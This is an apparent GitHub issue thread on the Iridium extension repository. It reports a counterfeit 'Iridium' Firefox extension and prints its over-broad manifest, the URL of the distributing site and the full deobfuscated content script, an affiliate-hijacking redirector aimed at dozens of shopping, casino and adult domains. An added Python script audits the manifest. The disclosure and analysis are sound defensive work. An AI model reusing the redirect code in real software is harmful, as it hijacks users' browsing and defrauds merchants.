ParticleCore / Iridium

Iridium is an extension built to improve your YouTube experience

Malicious browser extension attempting to pass as Iridium #566

Closed sm-Fifteen closed 5 years ago

sm-Fifteen commented 5 years ago

Hi, I'm not an Iridium user myself, but I just thought I should let you know that I've had a fake browser update popup attempting to install a Firefox extension in my browser. I've reported the website in question to Mozilla and downloaded the XPI to see what kind of extension this was, and the manifest and iridium.user files linked back here, so it appears parts of it were reused from the code of your extension, but the permissions are off and the code for ij.js and background.js is heavily obfuscated.

{
    "manifest_version" : 2,
    "name" : "Iridium",
    "version" : "0.2.1",
    "description" : "YouTube with more freedom",
    "default_locale" : "en",

    "background": {"scripts": ["js/background.js"]},

    "content_scripts" : [{
            "matches" : ["<all_urls>"],
            "js" : ["js/ij.js"],
            "css" : ["css/Iridium.css"],
            "run_at" : "document_start"
    }],

    "permissions" : ["storage","tabs","webRequest","webRequestBlocking","activeTab",
                    "<all_urls>","http://*/*", "https://*/*",
                    "unlimitedStorage", "cookies"
    ]
}

I'm not entirely sure if I should link to the malicious website in question, but I can probably at least attach the XPI file in question.

ww.zip

I've taken the time to deobfuscate the content script by hand, and it definitely doesn't look like the code in your GitHub repository to me.

ij-malicious.js.txt

I don't know if the maintainer(s) of this project can really do anything about this, but I figured they'd want to know about this.
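
A defender-side check for the "permissions are off" point raised above: the script below is an added example (not part of this issue and not Iridium's own code) that parses the manifest as posted and lists every permission and content-script scope exceeding an assumed YouTube-only baseline; the EXPECTED_PERMISSIONS baseline and the HIGH_IMPACT list are assumptions, not taken from the real Iridium manifest.

```python
import json

# Assumed baseline for a YouTube-only extension (not the real Iridium manifest).
EXPECTED_PERMISSIONS = {"storage", "*://www.youtube.com/*"}

# Host patterns that grant access to every origin.
ALL_HOSTS = {"<all_urls>", "http://*/*", "https://*/*", "*://*/*"}

# Permissions that let an extension read or alter traffic, cookies or tabs.
HIGH_IMPACT = {"webRequest", "webRequestBlocking", "cookies", "tabs",
               "proxy", "nativeMessaging", "history", "management"}

# Manifest as posted in the issue above (same keys and values, condensed).
POSTED_MANIFEST = """{
  "manifest_version": 2, "name": "Iridium", "version": "0.2.1",
  "description": "YouTube with more freedom", "default_locale": "en",
  "background": {"scripts": ["js/background.js"]},
  "content_scripts": [{"matches": ["<all_urls>"], "js": ["js/ij.js"],
                       "css": ["css/Iridium.css"], "run_at": "document_start"}],
  "permissions": ["storage", "tabs", "webRequest", "webRequestBlocking",
                  "activeTab", "<all_urls>", "http://*/*", "https://*/*",
                  "unlimitedStorage", "cookies"]
}"""


def audit_manifest(manifest_text, expected=EXPECTED_PERMISSIONS):
    """Return the permissions and content-script scopes that exceed the baseline."""
    manifest = json.loads(manifest_text)
    perms = set(manifest.get("permissions", []))
    report = {
        "all_hosts": sorted(perms & ALL_HOSTS),
        "high_impact": sorted(perms & HIGH_IMPACT),
        "unexpected": sorted(perms - expected - ALL_HOSTS - HIGH_IMPACT),
        # Index of every content script that is injected into all pages.
        "global_content_scripts": [],
    }
    for i, script in enumerate(manifest.get("content_scripts", [])):
        if set(script.get("matches", [])) & ALL_HOSTS:
            report["global_content_scripts"].append(i)
    return report


def is_suspicious(report):
    """True when any finding category is non-empty."""
    return any(report.values())


if __name__ == "__main__":
    for category, items in audit_manifest(POSTED_MANIFEST).items():
        print(f"{category}: {items}")
```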

sm-Fifteen commented 5 years ago

Just for good measure, here's the malicious website that prompts you to install said extension. I wouldn't advise anyone to try and go there (it automatically goes into full-screen mode and checks that it still is, to make sure you can't exit), but it might be good to know anyway: https://s3.amazonaws.com/ghred/ca/index.html

I've already filed a phishing report to Mozilla about it.

ParticleCore commented 5 years ago

I appreciate the due diligence you took with this and bringing it to my attention as well. Reporting it to Mozilla is the right thing to do, since they can blacklist the signature associated with that webextension, seeing that all of them now need to be signed in order to be installed in the user's browser, meaning Mozilla can "kill" it when necessary.

If you can, please link the website as well so that this can gather more awareness for any other users under the same situation unaware of what it might be or what they can do about it.

I have also taken the liberty to scan the zip you shared, so users interested in inspecting the code you shared are not tricked into a wolf-among-sheep kind of situation in case you were trying to pass off a virus:

ww.zip

https://www.virustotal.com/#/url/62158cf509f70ee8716036d07d185947721c62e5dbf4589ce49832fbed12916f/

ParticleCore commented 5 years ago

It appears the malicious webextension isn't even signed, fortunately this means vanilla Firefox would not allow the installation.

Out of curiosity, and if you are willing to, could you describe the actions that led you to come across this situation?

sm-Fifteen commented 5 years ago

Nothing in particular, it's one of those aggressive pop-ups you sometimes see on websites that are a bit desperate for ad revenue sources (more specifically tubeunblock.me, which I rarely use to get around region-locking on YouTube).

Makes me ponder why I ever stopped using NoScript. ;)

ParticleCore commented 5 years ago

A simple inspection of the extra file added to the original code, which @sm-Fifteen took the time to de-obfuscate, reveals that this is possibly a cookie hijacker of sorts, very likely meant to hijack user sessions via cookies, or it might be something related to ad revenue, but I am no expert on this matter, so here is the decoded code:

function setCookie(_0x7b5dx3, _0x7b5dx4, _0x7b5dx5) {
    var _0x7b5dx6 = new Date();
    _0x7b5dx6["setTime"](_0x7b5dx6["getTime"]() + (_0x7b5dx5 * 30 * 30 * 1000));
    var _0x7b5dx7 = "expires=" + _0x7b5dx6["toUTCString"]();
    document["cookie"] = _0x7b5dx3 + "=" + _0x7b5dx4 + ";" + _0x7b5dx7 + ";path=/"
}

function getCookie(_0x7b5dx3) {
    var _0x7b5dx9 = _0x7b5dx3 + "=";
    var _0x7b5dxa = document["cookie"]["split"](";");

    for (var _0x7b5dxb = 0; _0x7b5dxb < _0x7b5dxa["length"]; _0x7b5dxb++) {
        var _0x7b5dxc = _0x7b5dxa[_0x7b5dxb];

        while (_0x7b5dxc["charAt"](0) == " ") {
            _0x7b5dxc = _0x7b5dxc["substring"](1)
        };

        if (_0x7b5dxc["indexOf"](_0x7b5dx9) == 0) {
            return _0x7b5dxc["substring"](_0x7b5dx9["length"], _0x7b5dxc["length"])
        }
    };

    return false
}

var current_domain = window["location"]["hostname"];

if ((current_domain["match" ](/\./g) || [])["length"] > 1) {
    current_domain = current_domain["replace"](/^[^.]+\./g, "")
};

var domains = {
    "getnaughty.com": "http://performance.affiliaxe.com/aff_c?offer_id=16233&aff_id=5208",
    "wellhello.com": "http://performance.affiliaxe.com/aff_c?offer_id=16183&aff_id=5208",
    "raspberryketonesmax.com": "http://performance.affiliaxe.com/aff_c?offer_id=19060&aff_id=5208",
    "nastydress.com": "http://performance.affiliaxe.com/aff_c?offer_id=21953&aff_id=5208",
    "onenightfriend.com": "http://performance.affiliaxe.com/aff_c?offer_id=21214&aff_id=5208",
    "latinomeetup.com": "http://performance.affiliaxe.com/aff_c?offer_id=22749&aff_id=5208",
    "be2.com.mx": "http://performance.affiliaxe.com/aff_c?offer_id=21625&aff_id=5208",
    "phone.instantcheckmate.com": "http://performance.affiliaxe.com/aff_c?offer_id=21529&aff_id=5208",
    "xdates18.com": "http://performance.affiliaxe.com/aff_c?offer_id=16495&aff_id=5208",
    "hotels.com": "https://ad.admitad.com/g/q38i4899178357b808e19abd4df56e/",
    "qertewrt.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
    "moviooz.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
    "honkmedia.net": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
    "geeker.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
    "tvtubehd.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
    "hylaplay.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
    "adyieldoptimizer.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
    "bestbooklibrary.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
    "tzarmedia.com": "http://hlok.qertewrt.com/offer?prod=1&ref=5047804",
    "bluehost.com": "https://www.bluehost.com/track/llerena40/",
    "dreamhost.com": "http://mbsy.co/dreamhost/27813716",
    "iqoption.com": "http://affiliate.iqoption.com/redir/?aff=52375&afftrack=SUB_ID",
    "etoro.com": "http://llerena40.etoro.cpa.clicksure.com",
    "plus500.com": "http://www.plus500.com/Download/MultiPlatformDownload.aspx?id=108694&pl=2",
    "24option.com": "http://cldlr.com/?a=38471&c=118795&s1=SUB_ID",
    "richcasino.com": "https://www.richcasino.com/?sourceID=20020577",
    "bingohall.ag": "https://www.bingohall.ag/adpage?sourceID=133406",
    "bingocanada.com": "https://www.bingocanada.com/adpage2.asp?sourceID=133407",
    "bingoformoney.ag": "https://www.bingoformoney.ag/adpage2.asp?sourceID=133408",
    "internetbingo.com": "https://www.internetbingo.com/adpage2.asp?sourceID=133409",
    "vicsbingo.ag": "https://www.vicsbingo.ag/adpage2.asp?sourceID=133410",
    "southbeachbingo.ag": "https://www.southbeachbingo.ag/adpage2.asp?sourceID=133411",
    "instantbingo.ag": "https://www.instantbingo.ag/adpage2.asp?sourceID=133412",
    "winwardcasino.ag": "https://www.winwardcasino.ag/adpage2.asp?sourceID=111449",
    "slotsvillage.ag": "https://www.slotsvillage.ag/adpage2.asp?sourceID=106622",
    "thebescasino.com": "https://www.thebescasino.com/?sourceID=30012932",
    "amazon.com": "https://www.amazon.com/b?_encoding=UTF8&tag=addonsmash-20&linkCode=ur2&linkId=50b42eeef84ba67948669a1700411502&camp=1789&creative=9325&node=172282",
    "ebay.com": "https://qxsearch.com/ebay.php",
    "ebay.com.au": "https://qxsearch.com/ebay.php",
    "ebay.be": "https://qxsearch.com/ebay.php",
    "ebay.ca": "https://qxsearch.com/ebay.php",
    "ebay.fr": "https://qxsearch.com/ebay.php",
    "ebay.de": "https://qxsearch.com/ebay.php",
    "ebay.in": "https://qxsearch.com/ebay.php",
    "ebay.it": "https://qxsearch.com/ebay.php",
    "ebay.es": "https://qxsearch.com/ebay.php",
    "ebay.co.uk": "https://qxsearch.com/ebay.php",
    "888poker.com": "https://mmwebhandler.aff-online.com/c/39679?sr=1375734",
    "888poker.dk": "https://mmwebhandler.aff-online.com/c/36460?sr=1375734",
    "888poker.es": "https://mmwebhandler.aff-online.com/c/39569?sr=1375734",
    "888sport.it": "https://mmwebhandler.aff-online.com/c/38769?sr=1375734",
    "bbqbingo.com": "https://mmwebhandler.aff-online.com/c/35944?sr=1375734",
    "reefclubcasino.com": "https://mmwebhandler.aff-online.com/c/34730?sr=1375734",
    "cloudbet.com": "https://www.cloudbet.com/en/?af_token=f3f98fe976268100689848f7e4aa14c7&utm_source=google.&utm_medium=direct",
    "csgoroll.com": "http://csgoroll.com/promo/76561198030168097",
    "binance.com": "https://www.binance.com/?ref=15502839",
    "csgolive.com": "https://csgolive.com/ref/addonsmash",
    "drakewing.com": "https://www.drakewing.com/promo-code/1021953",
    "drakemoon.com": "https://www.drakemoon.com/promo-code/3863453",
    "livecasino.williamhill.com": "http://performance.afxplay.com/aff_c?offer_id=24373&aff_id=5208",
    "fiverr.com": "http://performance.affiliaxe.com/aff_c?offer_id=24355&aff_id=5208",
    "vulkanbet.com": "http://performance.affiliaxe.com/aff_c?offer_id=24049&aff_id=5208",
    "dji.com": "http://performance.affiliaxe.com/aff_c?offer_id=23941&aff_id=5208",
    "gearbest.com": "http://performance.affiliaxe.com/aff_c?offer_id=23057&aff_id=5208",
    "zaful.com": "http://performance.affiliaxe.com/aff_c?offer_id=21975&aff_id=5208",
    "twinkledeals.com": "http://performance.affiliaxe.com/aff_c?offer_id=21969&aff_id=5208",
    "rosegal.com": "http://performance.affiliaxe.com/aff_c?offer_id=21965&aff_id=5208",
    "dresslily.com": "http://performance.affiliaxe.com/aff_c?offer_id=21957&aff_id=5208",
    "sammydress.com": "http://performance.affiliaxe.com/aff_c?offer_id=21947&aff_id=5208",
    "agoda.com": "http://performance.affiliaxe.com/aff_c?offer_id=14727&aff_id=5208",
    "dx.com": "http://performance.affiliaxe.com/aff_c?offer_id=7026&aff_id=5208",
    "beautifulhalo.com": "http://performance.affiliaxe.com/aff_c?offer_id=25545&aff_id=5208",
    "silveroakcasino.com": "http://www.silveroakcasino.eu/click/1/8810/15991/1",
    "planet7casino.com": "http://www.planet7casino.eu/click/2/9071/15991/1",
    "royalacecasino.com": "http://www.royalacecasino.eu/click/3/8383/15991/1",
    "slotmadness.com": "http://www.slotmadness.eu/click/4/9005/15991/1",
    "captainjackcasino.com": "http://www.captainjackcasino.eu/click/5/8883/15991/1",
    "booking.com": "http://www.booking.com/index.html?aid=1227503",
    "namecheap.com": "https://www.namecheap.com/?aff=109347",
    "wix.com": "http://performance.affiliaxe.com/aff_c?offer_id=15591&aff_id=5208&aff_sub=SUB_ID",
    "aliexpress.com": "https://alitems.com/g/1e8d1144948357b808e116525dc3e8/",
    "norton.com": "http://performance.affiliaxe.com/aff_c?offer_id=21168&aff_id=5208",
    "betonline.ag": "http://record.commission.bz/_2ehAQxJHdmDUOsjNOfgKeWNd7ZgqdRLk/1/",
    "sportsbetting.ag": "http://record.commission.bz/_2ehAQxJHdmAOMRDMpvVHzmNd7ZgqdRLk/1/",
    "reimageplus.com": "http://txs9.fosx.gdn/?v=2AAGF07950",
    "mackeeper.com": "https://ad.admitad.com/g/26590ab6838357b808e1090faeb426/",
    "reezemac.space": "https://ad.admitad.com/g/26590ab6838357b808e1090faeb426/",
    "olymptrade.com": "https://olymptrade.com/l/LPL09-03-01en/affiliate?affiliate_id=236904&subid1=&subid2=",
    "mcafee.com": "http://performance.affiliaxe.com/aff_c?offer_id=11710&aff_id=5208",
    "lazada.co.th": "http://performance.affiliaxe.com/aff_c?offer_id=15859&aff_id=5208",
    "tweakbit.com": "http://performance.affiliaxe.com/aff_c?offer_id=25893&aff_id=5208",
    "hsselite.com": "http://performance.affiliaxe.com/aff_c?offer_id=24095&aff_id=5208",
    "uniblue.com": "http://performance.affiliaxe.com/aff_c?offer_id=23231&aff_id=5208",
    "www.booking.com": "http://www.booking.com/index.html?aid=1227503",
    "now-forskolin-extract.com": "http://performance.affiliaxe.com/aff_c?offer_id=21981&aff_id=5208",
    "geterectondemand.com": "http://performance.affiliaxe.com/aff_c?offer_id=21751&aff_id=5208",
    "alphalevoenergy.com": "http://performance.affiliaxe.com/aff_c?offer_id=21591&aff_id=5208",
    "garcinia-vip-life.com": "http://performance.affiliaxe.com/aff_c?offer_id=20320&aff_id=5208",
    "idollash.com": "http://performance.affiliaxe.com/aff_c?offer_id=19078&aff_id=5208",
    "media-fire.org": "http://performance.affiliaxe.com/aff_c?offer_id=12062&aff_id=5208",
    "videostripe.com": "http://performance.affiliaxe.com/aff_c?offer_id=12062&aff_id=5208",
    "chaturbate.com": "https://chaturbate.com/in/?track=default&tour=g4pe&campaign=yOy8z",
    "flirtfair.dk": "http://performance.affiliaxe.com/aff_c?offer_id=27393&aff_id=5208",
    "speedify.com": "http://performance.affiliaxe.com/aff_c?offer_id=26261&aff_id=5208",
    "rosewholesale.com": "http://performance.affiliaxe.com/aff_c?offer_id=21961&aff_id=5208"
}

if (typeof domains[current_domain] !== "undefined") {
    if (!getCookie(domains[current_domain])) {
        setCookie(domains[current_domain], "1", 5);
        window["location"] = domains[current_domain];
    }
};

var domains_nc = {
    "yllix.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "tradeadexchange.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "onclickads.net": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "onclicktop.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "popads.net": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "yieldtraffic.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "traffcashtds.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "buzzadnetwork.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "venturead.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "hilltopads.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "epom.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "clicksgear.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "puserving.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "ad-maven.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "blkget.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "onclkds.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "appscase.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "dumedia.ru": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "nextlnk8.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "turbobit.net": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "wowmovix.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "wowmusix.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "u85foldero.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "youporn.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "redtube.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "chaturbate.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "xhamster.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "pornhub.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "exoclick.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "xnxx.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "adbooth.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "thewhizmarketing.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "blpmovies.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}",
    "xvideos.com": "https://www.dexchangeinc.com/jump/next.php?r=2117079&sub1={source_id}"
};

if (typeof domains_nc[current_domain] !== "undefined") {
    window["location"] = domains_nc[current_domain]
}

sm-Fifteen commented 5 years ago

Yeah, see the js file I'd initially linked, which contains the deobfuscated source for the content script. I didn't check the background script, though, and I suspect it does a lot more interesting stuff because, as far as I know, "tabs","webRequest" and "webRequestBlocking" aren't accessible from content scripts.

ParticleCore commented 5 years ago

Apologies, I skipped part of your text and did not read the part where you mentioned you had already de-obfuscated it. I will replace it in my previous reply.

ParticleCore commented 5 years ago

The background.js file has been completely modified and appears to be designed to turn the user's computer into a zombie machine, probably to be part of a botnet of sorts.

I don't think there is any danger for any users using vanilla Firefox since it does not allow the installation of extensions that are not signed unless users have turned off that protection on their browser.

Rob--W commented 5 years ago

I'm not an Iridium user either, but I coincidentally came across this page. I don't see any new recent entries at the blocklist (I am expecting an entry for ID "{80869932-37ba-4dd4-8dfe-2ef30a2067cc}" at https://blocked.cdn.mozilla.net/ ). Has your report already been processed?

ParticleCore commented 5 years ago

It couldn't be reported because the provided add-on does not have a guid with it. I will however report that guid as potentially belonging to the add-on exposed in this issue. Thanks.

wagnerand commented 5 years ago

For the record, that file was signed (see the META-INF folder inside the extension). If you can't figure out the ID, that is no problem, just report it to us and attach the entire file.

Note that a report has already been filed for this add-on at https://bugzil.la/1497161

ParticleCore commented 5 years ago

Thanks for the input. I see it has been dealt with, so I'll be closing this issue now.